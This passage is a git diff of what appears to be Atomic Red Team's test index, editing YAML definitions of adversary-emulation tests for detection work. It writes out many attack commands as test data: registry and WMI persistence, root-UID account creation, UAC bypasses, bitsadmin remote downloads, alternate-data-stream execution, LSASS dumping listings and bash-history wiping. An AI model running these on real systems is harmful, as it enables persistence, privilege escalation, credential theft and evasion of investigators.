LSASS.exe Memory using ProcDump [windows] - - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] - - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] - - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows] - - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows] - - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows] - - Atomic Test #11: GPP Passwords (findstr) [windows] - - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows] - - Atomic Test #13: LSASS read with pypykatz [windows] - - Atomic Test #14: Registry parse with pypykatz [windows] + - Atomic Test #6: Dump LSASS.exe Memory using comsvcs.dll [windows] + - Atomic Test #7: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] + - Atomic Test #8: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #9: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #10: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #11: Create Volume Shadow Copy with NTDS.dit [windows] + - Atomic Test #12: Copy NTDS.dit from Volume Shadow Copy [windows] + - Atomic Test #13: GPP Passwords (findstr) [windows] + - Atomic Test #14: GPP Passwords (Get-GPPPassword) [windows] + - Atomic Test #15: LSASS read with pypykatz [windows] + - Atomic Test #16: Registry parse with pypykatz [windows] - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #3: Extracting passwords with findstr [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 103685f3..87171f76 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -62,7 +62,7 @@ persistence: - name: Add command to .bash_profile description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -75,11 +75,11 @@ persistence: name: sh command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' - name: Add command to .bashrc description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -92,7 +92,7 @@ persistence: name: sh command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' T1015: technique: x_mitre_permissions_required: @@ -178,7 +178,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -186,7 +186,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -303,7 +303,7 @@ persistence: - name: Admin Account Manipulate description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -522,7 +522,7 @@ persistence: description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system - ' +' supported_platforms: - windows input_arguments: @@ -535,7 +535,7 @@ persistence: elevation_required: true command: 'reg.exe import #{registry_file} - ' +' T1138: technique: x_mitre_data_sources: @@ -614,11 +614,8 @@ persistence: atomic_tests: - name: Application Shim Installation description: | - To test injecting DLL into a custom application - you need to copy AtomicShim.dll Into C:\Tools - As well as Compile the custom app. - We believe observing the shim install is a good - place to start. + Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." + will be displayed. supported_platforms: - windows input_arguments: @@ -636,13 +633,17 @@ persistence: executor: name: command_prompt elevation_required: true - command: | - sdbinst.exe #{file_path} - sdbinst.exe -u #{file_path} - - name: New shim database files created in the default shim database directory - description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + command: 'sdbinst.exe #{file_path} - ' +' + cleanup_command: 'sdbinst.exe -u #{file_path} + +' + - name: New shim database files created in the default shim database directory + description: | + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html supported_platforms: - windows executor: @@ -655,9 +656,11 @@ persistence: Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore - name: Registry key creation and/or modification events for SDB - description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + description: | + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing + the registry keys that were created. These keys can also be viewed using the Registry Editor. - ' + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html supported_platforms: - windows executor: @@ -772,10 +775,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' - name: Bitsadmin Download (PowerShell) description: | This test simulates an adversary leveraging bitsadmin.exe to download @@ -798,10 +801,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' - name: Persist, Download, & Execute description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer @@ -949,7 +952,7 @@ persistence: - name: Firefox description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -1052,10 +1055,10 @@ persistence: elevation_required: false command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc .hta=htafile - ' +' T1136: technique: x_mitre_permissions_required: @@ -1128,7 +1131,7 @@ persistence: - name: Create a user account on a Linux system description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -1141,14 +1144,14 @@ persistence: elevation_required: true command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' - name: Create a user account on a MacOS system description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: @@ -1172,11 +1175,11 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' - name: Create a new user in a command prompt - description: 'Creates a new user in a command prompt - - ' + description: | + Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the + new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD" supported_platforms: - windows input_arguments: @@ -1193,14 +1196,14 @@ persistence: elevation_required: true command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" - ' +' - name: Create a new user in PowerShell - description: 'Creates a new user in PowerShell - - ' + description: | + Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the + new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell" supported_platforms: - windows input_arguments: @@ -1213,15 +1216,15 @@ persistence: elevation_required: true command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' - name: Create a new user in Linux with `root` UID and GID. description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -1239,7 +1242,9 @@ persistence: command: | useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} echo "#{password}" | passwd --stdin #{username} - cleanup_command: 'userdel #{username}' + cleanup_command: 'userdel #{username} + +' T1038: technique: x_mitre_permissions_required: @@ -1413,7 +1418,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -1585,7 +1590,7 @@ persistence: - name: Create a hidden file in a hidden directory description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -1597,11 +1602,11 @@ persistence: echo "T1158" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' - name: Mac Hidden file description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: @@ -1610,42 +1615,61 @@ persistence: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' - name: Create Windows System File with Attrib - description: 'Creates a file and marks it as a system file using the attrib.exe - utility. - - ' + description: | + Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details + and observe that the Attributes are "SA" for System and Archive. supported_platforms: - windows + input_arguments: + file_to_modify: + description: File to modify using Attrib command + type: string + default: "%temp%\\T1158.txt" + dependency_executor_name: command_prompt + dependencies: + - description: The file must exist on disk at specified location (#{file_to_modify}) + prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )' + get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}' executor: name: command_prompt elevation_required: true - command: | - echo T1158 > %TEMP%\T1158.txt - attrib.exe +s %TEMP%\T1158.txt - cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 + command: 'attrib.exe +s #{file_to_modify} - ' +' + cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 + +' - name: Create Windows Hidden File with Attrib - description: 'Creates a file and marks it as hidden using the attrib.exe utility. - - ' + description: | + Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file + and observe that the Attributes are "SH" for System and Hidden. supported_platforms: - windows + input_arguments: + file_to_modify: + description: File to modify using Attrib command + type: string + default: "%temp%\\T1158.txt" + dependency_executor_name: command_prompt + dependencies: + - description: The file must exist on disk at specified location (#{file_to_modify}) + prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )' + get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}' executor: name: command_prompt - elevation_required: false - command: | - echo T1158_hidden > %TEMP%\T1158_hidden.txt - attrib.exe +h %TEMP%\T1158_hidden.txt - cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 + elevation_required: true + command: 'attrib.exe +h #{file_to_modify} - ' +' + cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 + +' - name: Hidden files description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -1658,11 +1682,11 @@ persistence: elevation_required: false command: 'setfile -a V #{filename} - ' +' - name: Hide a Directory description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -1673,11 +1697,11 @@ persistence: chflags hidden /var/tmp/T1158_mac.txt cleanup_command: 'rm /var/tmp/T1158_mac.txt - ' +' - name: Show all hidden files description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: @@ -1685,52 +1709,59 @@ persistence: elevation_required: false command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' - name: Create ADS command prompt - description: 'Create an Alternate Data Stream with the command prompt. Write - access is required. - - ' + description: | + Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% + folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt" supported_platforms: - windows input_arguments: file_name: description: File name of file to create ADS on. type: string - default: test.txt + default: "%temp%\\T1158_has_ads_cmd.txt" ads_filename: description: Name of ADS file. type: string default: adstest.txt + dependency_executor_name: command_prompt + dependencies: + - description: The file must exist on disk at specified location (#{file_name}) + prereq_command: 'IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )' + get_prereq_command: 'echo normal_text >> #{file_name} >nul 2>&1' executor: name: command_prompt elevation_required: false command: | - echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} - for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i + for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' - name: Create ADS PowerShell - description: 'Create an Alternate Data Stream with PowerShell. Write access - is required. - - ' + description: | + Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" + in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder. supported_platforms: - windows input_arguments: file_name: description: File name of file to create ADS on. type: string - default: test.txt + default: "$env:TEMP\\T1158_has_ads_powershell.txt" ads_filename: description: Name of ADS file. type: string default: adstest.txt + dependency_executor_name: powershell + dependencies: + - description: The file must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }' + get_prereq_command: 'New-Item -Path #{file_name} | Out-Null' executor: name: powershell elevation_required: false @@ -1738,10 +1769,9 @@ persistence: echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" set-content -path #{file_name} -stream #{ads_filename} -value "test2" set-content -path . -stream #{ads_filename} -value "test3" - ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' T1179: technique: x_mitre_data_sources: @@ -1871,7 +1901,7 @@ persistence: - name: Hook PowerShell TLS Encrypt/Decrypt Messages description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -2071,7 +2101,7 @@ persistence: - name: IFEO Add Debugger description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -2089,15 +2119,15 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f - ' +' - name: IFEO Global Flags description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -2225,7 +2255,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -2242,10 +2272,10 @@ persistence: elevation_required: true command: 'insmod #{kernel_module_file} - ' +' cleanup_command: 'rmmod #{module_name} - ' +' T1159: technique: x_mitre_permissions_required: @@ -2330,7 +2360,7 @@ persistence: - name: Launch Agent description: 'Create a plist and execute it - ' +' supported_platforms: - macos executor: @@ -2432,7 +2462,7 @@ persistence: - name: Launch Daemon description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos executor: @@ -2516,14 +2546,14 @@ persistence: - name: Launchctl description: 'Utilize launchctl - ' +' supported_platforms: - macos executor: name: sh command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - ' +' T1168: technique: x_mitre_data_sources: @@ -2611,7 +2641,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -2628,13 +2658,13 @@ persistence: name: bash command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - ' +' - name: Cron - Add script to cron folder description: 'This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -2651,7 +2681,7 @@ persistence: name: bash command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} - ' +' - name: Event Monitor Daemon Persistence description: "This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. \n" @@ -2753,17 +2783,16 @@ persistence: identifier: T1037 atomic_tests: - name: Logon Scripts - description: 'Adds a registry value to run batch script created in the C:\Windows\Temp - directory. - - ' + description: | + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + that can be viewed in the Registry Editor. supported_platforms: - windows input_arguments: script_path: description: Path to .bat file type: String - default: "$env:SystemRoot\\Temp\\art.bat" + default: "%temp%\\art.bat" script_command: description: Command To Execute type: String @@ -2772,16 +2801,16 @@ persistence: name: command_prompt elevation_required: false command: | - echo cmd /c "#{script_command}" > #{script_path} - REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" + echo "#{script_command}" > #{script_path} + REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f cleanup_command: | REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f - del #{script_path} >nul 2>nul - del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul + del #{script_path} >nul 2>&1 + del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1 - name: Scheduled Task Startup Script - description: 'Run an exe on user logon or system startup - - ' + description: | + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + the tasks, open the Task Scheduler and look in the Active Tasks pane. supported_platforms: - windows executor: @@ -2796,7 +2825,7 @@ persistence: - name: Logon Scripts - Mac description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -2809,10 +2838,11 @@ persistence: Populate the plist with the location of your shell script\n\n\t defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" - name: Supicious vbs file run from startup Folder - description: 'vbs files can be placed in and ran from the startup folder to - maintain persistance - - ' + description: "vbs files can be placed in and ran from the startup folder to + maintain persistance. Upon execution, \"T1137 Hello, World VBS!\" will be + displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" supported_platforms: - windows executor: @@ -2827,9 +2857,11 @@ persistence: Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore - name: Supicious jse file run from startup Folder - description: | - jse files can be placed in and ran from the startup folder to maintain persistance. - Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice. + description: "jse files can be placed in and ran from the startup folder to + maintain persistance.\nUpon execution, \"T1137 Hello, World JSE!\" will be + displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" supported_platforms: - windows executor: @@ -2846,7 +2878,8 @@ persistence: - name: Supicious bat file run from startup Folder description: | bat files can be placed in and executed from the startup folder to maintain persistance. - Upon execution, cmd will be run and immediately closed. + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + folder and will also run when the computer is restarted and the user logs in. supported_platforms: - windows executor: @@ -3005,7 +3038,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -3017,7 +3050,7 @@ persistence: name: command_prompt command: 'netsh.exe add helper #{helper_file} - ' +' T1050: technique: x_mitre_permissions_required: @@ -3430,7 +3463,7 @@ persistence: - name: Plist Modification description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -3523,7 +3556,7 @@ persistence: description: 'Appends a start process cmdlet to the current user''s powershell profile pofile that points to a malicious executable - ' +' supported_platforms: - windows input_arguments: @@ -3604,7 +3637,7 @@ persistence: command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' T1164: technique: x_mitre_permissions_required: @@ -3786,11 +3819,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f - ' +' - name: Reg Key RunOnce description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will @@ -3807,11 +3840,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f - ' +' - name: PowerShell Registry RunOnce description: | RunOnce Key Persistence via PowerShell @@ -3836,7 +3869,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' T1053: technique: x_mitre_permissions_required: @@ -3941,7 +3974,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' - name: Scheduled task Local description: "Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. \n" @@ -3961,10 +3994,10 @@ persistence: elevation_required: true command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F - ' +' - name: Scheduled task Remote description: "Create a task on a remote system.\n\nUpon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote @@ -3998,10 +4031,10 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F - ' +' - name: Powershell Cmdlet Scheduled Task description: "Create an atomic scheduled task that leverages native powershell cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled @@ -4021,7 +4054,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' T1180: technique: x_mitre_data_sources: @@ -4084,7 +4117,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -4425,7 +4458,7 @@ persistence: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -4451,7 +4484,7 @@ persistence: - name: Set a SetUID flag on file description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -4469,11 +4502,11 @@ persistence: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' - name: Set a SetGID flag on file description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -4491,7 +4524,7 @@ persistence: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' T1023: technique: x_mitre_permissions_required: @@ -4557,11 +4590,11 @@ persistence: command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1 - ' +' - name: Create shortcut to cmd in startup folders description: 'LNK file to launch CMD placed in startup folder - ' +' supported_platforms: - windows executor: @@ -4657,10 +4690,10 @@ persistence: elevation_required: true command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' T1501: technique: x_mitre_data_sources: @@ -4759,7 +4792,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -4975,10 +5008,10 @@ persistence: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} - ' +' cleanup_command: 'del #{web_shell_path} >nul 2>&1 - ' +' T1084: technique: x_mitre_permissions_required: @@ -5042,11 +5075,10 @@ persistence: modified: '2019-10-15T18:43:47.703Z' identifier: T1084 atomic_tests: - - name: Persistence + - name: Persistence via WMI Event Subscription description: | - Run from an administrator powershell window - - After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. Code references @@ -5078,7 +5110,6 @@ persistence: $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject @@ -5161,11 +5192,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' - name: Winlogon Userinit Key Persistence - PowerShell description: | PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. @@ -5184,11 +5215,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' - name: Winlogon Notify Key Logon Persistence - PowerShell description: | PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. @@ -5210,7 +5241,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' defense-evasion: '': technique: @@ -5373,10 +5404,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' - name: Bitsadmin Download (PowerShell) description: | This test simulates an adversary leveraging bitsadmin.exe to download @@ -5399,10 +5430,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' - name: Persist, Download, & Execute description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer @@ -5513,7 +5544,7 @@ defense-evasion: elevation_required: false command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' T1088: technique: x_mitre_data_sources: @@ -5629,7 +5660,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f - ' +' - name: Bypass UAC using Event Viewer (PowerShell) description: | PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ @@ -5650,12 +5681,12 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC using Fodhelper description: 'Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -5672,12 +5703,12 @@ defense-evasion: fodhelper.exe cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f - ' +' - name: Bypass UAC using Fodhelper - PowerShell description: 'PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -5696,7 +5727,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC using ComputerDefaults (PowerShell) description: | PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 @@ -5719,7 +5750,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC by Mocking Trusted Directories description: | Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems @@ -5820,7 +5851,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -5840,12 +5871,12 @@ defense-evasion: elevation_required: false command: 'cmstp.exe /s #{inf_file_path} - ' +' - name: CMSTP Executing UAC Bypass description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -5865,7 +5896,7 @@ defense-evasion: elevation_required: false command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' T1146: technique: x_mitre_data_sources: @@ -5918,7 +5949,7 @@ defense-evasion: - name: Clear Bash history (rm) description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos @@ -5926,11 +5957,11 @@ defense-evasion: name: sh command: 'rm ~/.bash_history - ' +' - name: Clear Bash history (echo) description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos @@ -5938,11 +5969,11 @@ defense-evasion: name: sh command: 'echo "" > ~/.bash_history - ' +' - name: Clear Bash history (cat dev/null) description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos @@ -5950,11 +5981,11 @@ defense-evasion: name: sh command: 'cat /dev/null > ~/.bash_history - ' +' - name: Clear 